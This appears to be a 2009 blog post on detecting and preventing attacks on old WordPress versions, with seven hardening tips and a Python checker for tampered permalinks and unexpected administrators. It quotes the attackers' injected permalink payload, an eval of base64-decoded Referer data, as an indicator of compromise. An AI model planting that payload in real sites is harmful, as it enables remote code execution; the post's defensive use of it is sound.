September 6, 2009
 

7 Simple Ways to protect your blog from WordPress Attack

Over the last two days, many WordPress bloggers have reported hacking attacks on their blogs. The attackers have targeted blogs running old versions of WordPress, which are vulnerable to such malicious attacks.

These attacks are spreading very quickly among WordPress users, and the time has come to take some precautionary steps. If you don’t take immediate action on your blog, get ready to lose all your data.

How to find whether your blog has been attacked?

It’s very simple to detect this recent WordPress attack. Check your blog’s permalink structure. If your blog is under attack, you’ll find the following unusual code in the permalink structure.

http://www.your_blog_name.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/.

There is another way to detect this severe attack. Go to the WordPress Dashboard and check the names of users. You may find some unexpected users registered on the blog. If this is the case, your blog has been attacked by hackers.

These are the only two ways to detect this attack. Go through your blog’s settings and, if you find anything suspicious, act quickly.
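Both checks can also be scripted. The following is an added example, not code from the original post: it assumes you have copied the permalink structure from Settings >> Permalinks and the user list from the Users screen, and the function names and sample users are made up for illustration.

```python
import re
from urllib.parse import unquote

# Structure tags WordPress documents for permalinks.
KNOWN_TAGS = ("%year%", "%monthnum%", "%day%", "%hour%", "%minute%", "%second%",
              "%post_id%", "%postname%", "%category%", "%author%")
# PHP fragments taken from the indicator quoted in this post.
CODE_MARKERS = ("eval(", "base64_decode", "$_SERVER", "${")
SAFE_LEFTOVER = re.compile(r"[A-Za-z0-9/_.\-]*")

def check_permalink(structure):
    """Return the reasons a permalink structure looks tampered with."""
    reasons = []
    # Look at the raw value and its percent-decoded form, because the
    # indicator is shown partly URL-encoded (%7B is "{").
    for form in (structure, unquote(structure)):
        for marker in CODE_MARKERS:
            hit = "code marker: " + marker
            if marker.lower() in form.lower() and hit not in reasons:
                reasons.append(hit)
    # Allowlist: once known tags are removed, only path characters may remain.
    leftover = structure
    for tag in KNOWN_TAGS:
        leftover = leftover.replace(tag, "")
    if not SAFE_LEFTOVER.fullmatch(leftover):
        reasons.append("unexpected characters outside known tags")
    return reasons

def unexpected_admins(users, expected):
    """users: (login, role) pairs; expected: administrator logins you created."""
    return sorted(login for login, role in users
                  if role == "administrator" and login not in expected)

# Constructed sample: a normal structure followed by the code shown in this post.
SAMPLE_TAMPERED = ("/%category%/%postname%/"
                   "%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/")
# Constructed sample user list (logins are invented).
SAMPLE_USERS = [("siteowner", "administrator"), ("guest_writer", "author"),
                ("x9_tmp", "administrator")]

if __name__ == "__main__":
    for reason in check_permalink(SAMPLE_TAMPERED):
        print("permalink:", reason)
    for login in unexpected_admins(SAMPLE_USERS, {"siteowner"}):
        print("unexpected administrator:", login)
```

An empty result from both functions means neither of the two signs described above is present.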

7 Simple Ways to protect your blog from WordPress Attack

Okay, now you know that your blog has not been attacked. So, it’s time to make it safe from future attacks. Check out the following important steps to secure your WordPress blog.

1. Update WordPress

This is the first and most important step to keep your blog clean and immune. Update your blog to the latest WP version, WordPress 2.8.4. You can also download it from here -

http://wordpress.org/download/

As I said earlier, older versions of WordPress are the main victims. So, it’s very important to keep your blog updated.

2. Update WordPress Plugins

Although WordPress plugins are not the reason behind these attacks, keep them updated to their newest versions. If you find that a plugin is not compatible with WordPress 2.8.4, deactivate it and remove it completely from your blog. Report the errors to the plugin’s owner. Such plugins might give you trouble in the long term.

3. Change Passwords

It’s one of the best techniques to keep your blog away from such attacks. Change all the passwords of your blog, including FTP accounts, SQL databases, email accounts related to your blog, etc. Don’t use the same password for all accounts. A password should be a good combination of characters and numbers. Make it as complicated as possible.

4. Delete Users

If you have any inactive user accounts on your blog, delete them and transfer their data to your account. Don’t keep useless accounts on your blog.

Also, don’t keep the default WordPress username “admin” as an administrator of your blog. Create a new user with admin rights and delete the default account.

5. Set the Priority and Role of User

If you have multiple authors on your blog, don’t give administrator rights to everyone. Set their role as “Author” or “Editor”.

Uncheck the “Membership” option and set the new user default role as “Subscriber”.

6. Check Permalink Settings

As these attacks basically affect the permalink structures of blogs, make sure your permalink settings are appropriate. You can check them at this path -

WordPress Dashboard >> Settings >> Permalinks

7. Backup your blog

Always keep a backup of your blog and make sure it doesn’t contain any malicious script. Save the backup file on your hard drive; don’t store it on the hosting server.

One more important thing: keep a separate folder of your blog theme on your computer. It’ll save you lots of work and time during a new WordPress installation.

Prevention is always better than cure! So, follow all the above-mentioned steps to protect your blog from hacker attacks. If you know any other easy way to avoid attacks or have any doubts regarding these attacks, please let me know via the comments below.